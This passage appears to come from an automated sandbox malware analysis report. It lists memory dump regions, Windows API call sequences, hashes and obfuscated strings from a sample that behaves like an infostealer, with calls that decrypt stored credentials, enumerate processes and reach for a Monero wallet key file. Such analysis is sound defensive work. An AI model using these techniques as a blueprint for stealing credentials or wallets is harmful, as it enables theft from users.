                                     • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #UM$$_/$5ins$[w$l67
                                    • API String ID: 0-3994591404
                                    • Opcode ID: 8b1c89071fe80a56c6d04a42346b7b1f5098f724914047fb34f342b9390ee199
                                    • Instruction ID: c25827dc7d087391de19114c91f9849ce2aae955c2b4da3f5c9f2cd0ac424874
                                    • Opcode Fuzzy Hash: 8b1c89071fe80a56c6d04a42346b7b1f5098f724914047fb34f342b9390ee199
                                    • Instruction Fuzzy Hash: 6AB206F3A0C2149FE3046E2DEC8567ABBE9EF94320F1A453DEAC4C3744EA7558058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                     • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ai{$gHY|$~|_$q~o$ugo
                                    • API String ID: 0-401286909
                                    • Opcode ID: 07737e6af603c173caaa460c62f2b2f36b85350b3cbbaefb56c66d896bdb3c0c
                                    • Instruction ID: 5eda399b63443f90a540e5dc5b3e8bcddf05a96679264bb89b742163076fe541
                                    • Opcode Fuzzy Hash: 07737e6af603c173caaa460c62f2b2f36b85350b3cbbaefb56c66d896bdb3c0c
                                    • Instruction Fuzzy Hash: F4B2D5F350C200AFE708AE29EC4567AFBE9EF94720F1A892DE6C5C3344E63558458797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :qj$VFX$pU;~$}dF$+:
                                    • API String ID: 0-3252026929
                                    • Opcode ID: e2a5bc310981b845c65c453aea104104ca25fcb0b826cec19acb32d07e5d8581
                                    • Instruction ID: 9e63710d9939b05e5a3b32c68c3941020a32ed5594bf8930b8ebcecda3bb638a
                                    • Opcode Fuzzy Hash: e2a5bc310981b845c65c453aea104104ca25fcb0b826cec19acb32d07e5d8581
                                    • Instruction Fuzzy Hash: DCB204F3A0C2049FE3086E29EC8567AFBE5EF94320F16492DEAC5C7744E63558418B97
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FAC871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FAC87C
                                    • lstrcat.KERNEL32(?,00FC0B46), ref: 00FAC943
                                    • lstrcat.KERNEL32(?,00FC0B47), ref: 00FAC957
                                    • lstrcat.KERNEL32(?,00FC0B4E), ref: 00FAC978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 5a33d6ef675b1be2b148d51bb71b6ffabe0c3f852fc5c9ae03c185e70c55f816
                                    • Instruction ID: 2c7fd4d4546ae1e476249d91361f7247faa4152acc6665972a3939e6e0234483
                                    • Opcode Fuzzy Hash: 5a33d6ef675b1be2b148d51bb71b6ffabe0c3f852fc5c9ae03c185e70c55f816
                                    • Instruction Fuzzy Hash: D1414CB5D0421ADBDB24DFD0DD89BEEBBB8AF88304F1041A8F509A7280D7745A84DF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FA724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FA7254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FA7281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00FA72A4
                                    • LocalFree.KERNEL32(?), ref: 00FA72AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 38e37d4ba890d5a8783697cd8cc51e19980d88534e9b4328d3f094584c880b5c
                                    • Instruction ID: 75d400aa119f68bd2249ccc443c9ccbfb5112eb5b11b7562c699d99f235e5497
                                    • Opcode Fuzzy Hash: 38e37d4ba890d5a8783697cd8cc51e19980d88534e9b4328d3f094584c880b5c
                                    • Instruction Fuzzy Hash: 1E0140B5A40308BBDB24DBD4DD46F9D77B8AB44701F104054FB15AB2C4DA70AA418B65
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FB961E
                                    • Process32First.KERNEL32(00FC0ACA,00000128), ref: 00FB9632
                                    • Process32Next.KERNEL32(00FC0ACA,00000128), ref: 00FB9647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00FB965C
                                    • CloseHandle.KERNEL32(00FC0ACA), ref: 00FB967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: a013efaffb6290370f3159161dc3362aa8c06a1fda1edcf7d066081c90190f23
                                    • Instruction ID: 3b3f9ef35d57ec688c16d2368b866854f362cca7ef8c62e509dbd05d9cea2ab0
                                    • Opcode Fuzzy Hash: a013efaffb6290370f3159161dc3362aa8c06a1fda1edcf7d066081c90190f23
                                    • Instruction Fuzzy Hash: 85015EB5A04208EBCB24DFE5D898BEDBBF9EF08311F004198A90A97240D7749B80DF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :20$\M/$r^w7$xEI2
                                    • API String ID: 0-1202915757
                                    • Opcode ID: 6bd33c173357c1396dea7cce45d00125e9133d5947c6cf33511bf8d0076a26ef
                                    • Instruction ID: 4d27ed9668bb92bdb1419b73143ed859106f8fb74c3fe09af76fbaa895021005
                                    • Opcode Fuzzy Hash: 6bd33c173357c1396dea7cce45d00125e9133d5947c6cf33511bf8d0076a26ef
                                    • Instruction Fuzzy Hash: CDB236F360C2049FE3046E2DEC8567AFBEAEBD4320F1A463DE6C4C7744EA7558058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 5iU<$:%1$a]_$e0\
                                    • API String ID: 0-844207780
                                    • Opcode ID: c0bd010a54b29e73d211acb7846f28471478535c787ee140cf2c45c659347c27
                                    • Instruction ID: 7defdf44d74cb61928940adf26affe4b7c7ec782b77d997f1c9be90f51ed33f1
                                    • Opcode Fuzzy Hash: c0bd010a54b29e73d211acb7846f28471478535c787ee140cf2c45c659347c27
                                    • Instruction Fuzzy Hash: 4AB2F5F360C2009FE7046E2DEC8567ABBE9EF94320F1A463DEAC4C7744E63598058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: S[$alm$s{zs$t~
                                    • API String ID: 0-3394095219
                                    • Opcode ID: 19065c3349c415a5f892d8dccdf403d2724bba9f28d22818feaf03ba5a9c4f5c
                                    • Instruction ID: 3020e6822e9b92bb0db96c5936977948db01a887e14953ed53040806376ffd0a
                                    • Opcode Fuzzy Hash: 19065c3349c415a5f892d8dccdf403d2724bba9f28d22818feaf03ba5a9c4f5c
                                    • Instruction Fuzzy Hash: 6BA2F7F350C204AFE304BE29EC85A7ABBE9EF94760F16493DE6C4C7744E63598018697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Zg/$F29;$ao~$~C{}
                                    • API String ID: 0-3042852259
                                    • Opcode ID: e6c9a235fbdf298f4eadf306a6e2a668ea55cf0a4e7d62df26e5bc9894538ab7
                                    • Instruction ID: 1aedb69c95027c1e1bc9296091d4e5a7456808a23bcd4dc12e176cb15a6bf107
                                    • Opcode Fuzzy Hash: e6c9a235fbdf298f4eadf306a6e2a668ea55cf0a4e7d62df26e5bc9894538ab7
                                    • Instruction Fuzzy Hash: F6820AF3A082049FE7046E2DEC8577AFBEAEBD4720F1A453DE6C4C3744E93598058696
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00FC05B7), ref: 00FB86CA
                                    • Process32First.KERNEL32(?,00000128), ref: 00FB86DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 00FB86F3
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • CloseHandle.KERNEL32(?), ref: 00FB8761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 212637238fe07e88746f4212690aa62ceea1494806cd03c837014365a156ad4f
                                    • Instruction ID: db7bff3a436ca079ff7e6b41d18841326c765a3b9912da9218d1604edcaa6a75
                                    • Opcode Fuzzy Hash: 212637238fe07e88746f4212690aa62ceea1494806cd03c837014365a156ad4f
                                    • Instruction Fuzzy Hash: 83314D71901218ABCB24DF96DC55FEEB7B8EF45700F1041A9E10AA6190DF346E45DFA1
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00FA5184,40000001,00000000,00000000,?,00FA5184), ref: 00FB8EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: b5944e89e05d08f1b0dc0e98186f7923ca44bb7e1d0ace270a2b0e88e8fea980
                                    • Instruction ID: 4065255a2c55d6124e5645d4bca68defaba49f2b33607269e1d0e58cc3ef72ae
                                    • Opcode Fuzzy Hash: b5944e89e05d08f1b0dc0e98186f7923ca44bb7e1d0ace270a2b0e88e8fea980
                                    • Instruction Fuzzy Hash: 5D110671200208AFDB04DFA5E884FFA37ADAFC9750F109458F9198B240DB35E882EF60
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: b55e1a87ec8090373f494b0a30b85cb3df8818b283b39e1a2c8523f11ea0b322
                                    • Instruction ID: f5944ff50538b6983e7bbfa927eff062fa00dbaf86abd015afda834ef903456f
                                    • Opcode Fuzzy Hash: b55e1a87ec8090373f494b0a30b85cb3df8818b283b39e1a2c8523f11ea0b322
                                    • Instruction Fuzzy Hash: EA11D4B4640208EFEB14CFA4D895FAA77B5FB89711F208068F9159F384C7B1AA41DB60
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FC0E00,00000000,?), ref: 00FB79B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB79B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00FC0E00,00000000,?), ref: 00FB79C4
                                    • wsprintfA.USER32 ref: 00FB79F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 9c724def411c61cf783d1b29a339ac9dfedee9613fc8b2b6169e3e1ce5fa7c1e
                                    • Instruction ID: 7d2369aa55e278c38cd73942d9b6a5fb717406c8e38464acf812fd69f4b53867
                                    • Opcode Fuzzy Hash: 9c724def411c61cf783d1b29a339ac9dfedee9613fc8b2b6169e3e1ce5fa7c1e
                                    • Instruction Fuzzy Hash: 6A112EB2904118ABCB14DFC9E945FBEB7F8FB4CB11F10411AF515A2284D3395940DB71
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008CDE00,00000000,?,00FC0E10,00000000,?,00000000,00000000), ref: 00FB7A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008CDE00,00000000,?,00FC0E10,00000000,?,00000000,00000000,?), ref: 00FB7A7D
                                    • wsprintfA.USER32 ref: 00FB7AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 6bebab8879eb6fb1a779928ca32aaa5661f9fcfa4211753d5da00d6e45a637bf
                                    • Instruction ID: 6d26c504f99bc37bde18a63daf166f5614733f71a024a63a9505a8f58a4a635b
                                    • Opcode Fuzzy Hash: 6bebab8879eb6fb1a779928ca32aaa5661f9fcfa4211753d5da00d6e45a637bf
                                    • Instruction Fuzzy Hash: DA11C2B1905218DBDB249F94DC45F99BBB8FB44721F1043A9E516932C0C7345A80CF51
                                    APIs
                                    • CoCreateInstance.COMBASE(00FBE118,00000000,00000001,00FBE108,00000000), ref: 00FB3758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00FB37B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: fb85068a6a25415259eaaf3b3b55f2ae22ac9fbae8cce9270292931ebd20975e
                                    • Instruction ID: 5994a277414946b3bc1a79c3122a8ef5a8b1221759a5f36dac5a3eee6b9652de
                                    • Opcode Fuzzy Hash: fb85068a6a25415259eaaf3b3b55f2ae22ac9fbae8cce9270292931ebd20975e
                                    • Instruction Fuzzy Hash: 61410671A40A289FDB24DB58CC94BDBB7B5BB48302F4041D8E608AB290E771AEC5CF50
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FA9B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FA9BA3
                                    • LocalFree.KERNEL32(?), ref: 00FA9BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 604933f57a7ef5b098d78974eee4a6a77c4e7235badc6d009ba17cb4d793d39f
                                    • Instruction ID: 0c18df4ea5495b8a09ed0ca1583a47ae39a33f5d9f4b189dff327fefd65fbb42
                                    • Opcode Fuzzy Hash: 604933f57a7ef5b098d78974eee4a6a77c4e7235badc6d009ba17cb4d793d39f
                                    • Instruction Fuzzy Hash: DC11FAB8A00209DFDB04DF94D985AAE77F5FF89300F104568E8159B340D774AE50CF61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                     • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :coy$@s7;
                                    • API String ID: 0-2320488287
                                    • Opcode ID: 7a88968446e036a58fa5422e63d49a1640519f408430f2b02f88853cf49cf70e
                                    • Instruction ID: 36a7ae688075033c500c462185e8a3444d6ca3f7c5d875da78a59499de060bcf
                                    • Opcode Fuzzy Hash: 7a88968446e036a58fa5422e63d49a1640519f408430f2b02f88853cf49cf70e
                                    • Instruction Fuzzy Hash: EF41E7F3A083089BF3047E59DC8576AB3D9EB94710F1A853CD7D883B44E939A9058396
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: y{V
                                    • API String ID: 0-4047489751
                                    • Opcode ID: 9accaa2b0f35b3252f0aab11926d7ec489589ec83f5929cd140d1d5a44f3ffba
                                    • Instruction ID: bdb7a917dba2763b57d806aadd68d6c656ee64ae5057f57a7aae108ff743a94b
                                    • Opcode Fuzzy Hash: 9accaa2b0f35b3252f0aab11926d7ec489589ec83f5929cd140d1d5a44f3ffba
                                    • Instruction Fuzzy Hash: 1461F5F3E182005FF3149E3DED4576ABBD6DBD4720F1B863DEA8893784E93898058646
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *){:
                                    • API String ID: 0-3549467814
                                    • Opcode ID: 7e065eed9117f24f9b115821cf4d1143d33411419678e3cfcb11d63f610e3e44
                                    • Instruction ID: 2331c6d3ad93d39b7405d0135603cf98dbf575f5ce9e459858f3051e227d7698
                                    • Opcode Fuzzy Hash: 7e065eed9117f24f9b115821cf4d1143d33411419678e3cfcb11d63f610e3e44
                                    • Instruction Fuzzy Hash: 1A415CB3E082245FE3085A2DDC557AAB7DAEBD4730F1A453EEA85D7384E9794C0183D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0ff59c80c4cdc5bc26ccba5976c3d21abaa0c09e700d77ef46d5205d8648963c
                                    • Instruction ID: ec18aee3eba6ca66be82ddfa730d1379bac9362068ed6d8f35f8dcca062221f0
                                    • Opcode Fuzzy Hash: 0ff59c80c4cdc5bc26ccba5976c3d21abaa0c09e700d77ef46d5205d8648963c
                                    • Instruction Fuzzy Hash: 637104F3E083045FE7047E2DDC8976ABBE4EB94720F0A463DDAC497745EA3959048683
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 87a1d4d6a9ea1dcc7abc6db43c10c197e8a141b7ec59deef29e8abe139c98625
                                    • Instruction ID: 48518d17b443065413ba488f1c4d39a18ed5eade763abe4fa4d6085fbddc035e
                                    • Opcode Fuzzy Hash: 87a1d4d6a9ea1dcc7abc6db43c10c197e8a141b7ec59deef29e8abe139c98625
                                    • Instruction Fuzzy Hash: 2A517CF3E186005BF30CAD2EFC9577A76D6DBD8310F6A863DD986C7780E83848058186
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ad54b53e834e520d7d689ede328bb3652e223a668eb4264e40012a19774e622a
                                    • Instruction ID: 118ee5ec6f1d89da26bf31c3ec3eca1edefe0e6722914c3789b90508c6b790f4
                                    • Opcode Fuzzy Hash: ad54b53e834e520d7d689ede328bb3652e223a668eb4264e40012a19774e622a
                                    • Instruction Fuzzy Hash: 9A513CF39083089BD7007A6DEC4577AFBD9EF90620F26493EE684C3380F9B56C458656
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e4087a20d23b285f4c1e4ef123ac400cd82a834806e99bf6a71fbca30e9beaee
                                    • Instruction ID: 54c4d104012ca03d8daf43b9f7ab1f681e1c84e6b932165406b6777930eab9c8
                                    • Opcode Fuzzy Hash: e4087a20d23b285f4c1e4ef123ac400cd82a834806e99bf6a71fbca30e9beaee
                                    • Instruction Fuzzy Hash: B9313BF3A082046FE3046A4DFC80A7BB7D9D7D4320F2A4639EE94C7740E5369C068692
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ac82f76ad6db31649e8c6c4965542ed40f064bb99d2d7d9443dded5ed1ebd24f
                                    • Instruction ID: b3e7896a01155956103d4726134fd49dca717eb61d089ac2064ede3a67bef3cb
                                    • Opcode Fuzzy Hash: ac82f76ad6db31649e8c6c4965542ed40f064bb99d2d7d9443dded5ed1ebd24f
                                    • Instruction Fuzzy Hash: A83128F790C6089BD7006E29DC8073AFEEEEB94228F26462AE9D5E3B10D1755C0186D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 46ef6e441e1e9d310ea3f8e456257ab5871483ac03b62047433107fa46d1ca50
